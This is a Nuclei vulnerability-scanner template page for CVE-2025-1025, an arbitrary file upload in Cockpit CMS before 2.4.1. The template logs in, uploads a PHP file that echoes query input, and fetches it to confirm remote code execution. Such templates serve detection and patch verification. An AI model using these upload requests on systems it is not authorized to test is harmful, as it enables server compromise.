Cockpit < 2.4.1 - Arbitrary File Upload

ID: CVE-2025-1025

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2025,cockpit,file-upload,rce,intrusive

Description

Versions of the package cockpit-hq/cockpit before 2.4.1 are vulnerable to Arbitrary File Upload where an attacker can use different extensions to bypass the upload filter.

YAML Source

id: CVE-2025-1025

info:
  name: Cockpit < 2.4.1 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Versions of the package cockpit-hq/cockpit before 2.4.1 are vulnerable to Arbitrary File Upload where an attacker can use different extensions to bypass the upload filter.
  reference:
    - https://github.com/advisories/GHSA-wp68-xrfg-xvq4
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1025
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-1025
    cwe-id: CWE-434
  metadata:
    max-request: 4
    verified: true
    shodan-query: title:"Cockpit"
  tags: cve,cve2025,cockpit,file-upload,rce,intrusive

flow: http(1) && http(2) && http(3)

variables:
  username: "{{username}}"
  password: "{{password}}"
  marker: "{{randstr_1}}"

http:
  - raw:
      - |
        GET /auth/login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /auth/check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=UTF-8

        {"auth":{"user":"{{username}}","password":"{{password}}"},"csrf":"{{csrf}}"}

    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - '"role":'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: csrf
        group: 1
        part: body
        regex:
          - 'csrf : "(.*?)"'
        internal: true

  - raw:
      - |
        POST /assets/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lKO5LogRxX0YStI

        ------WebKitFormBoundary3lKO5LogRxX0YStI
        Content-Disposition: form-data; name="folder"


        ------WebKitFormBoundary3lKO5LogRxX0YStI
        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
        Content-Type: text/php

        <?php echo base64_decode($_GET["q"]);?>
        ------WebKitFormBoundary3lKO5LogRxX0YStI--

    matchers:
      - type: word
        part: body
        words:
          - '"uploaded":["{{randstr}}.php"]'
        internal: true

    extractors:
      - type: json
        name: upload_path
        part: body
        json:
          - '.assets[0].path'
        internal: true

  - raw:
      - |
        GET /storage/uploads/{{upload_path}}?q={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '{{marker}}'
# digest: 4a0a0047304502202a4acd412c5917237e8cfabc029c4fc70d73361c3ba88b960350426538d927a9022100d2e4aae916e5f42b057dba092a72983c36771975aaf7d55a1e69ffa09b716b41:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-1025.yaml"

View on Github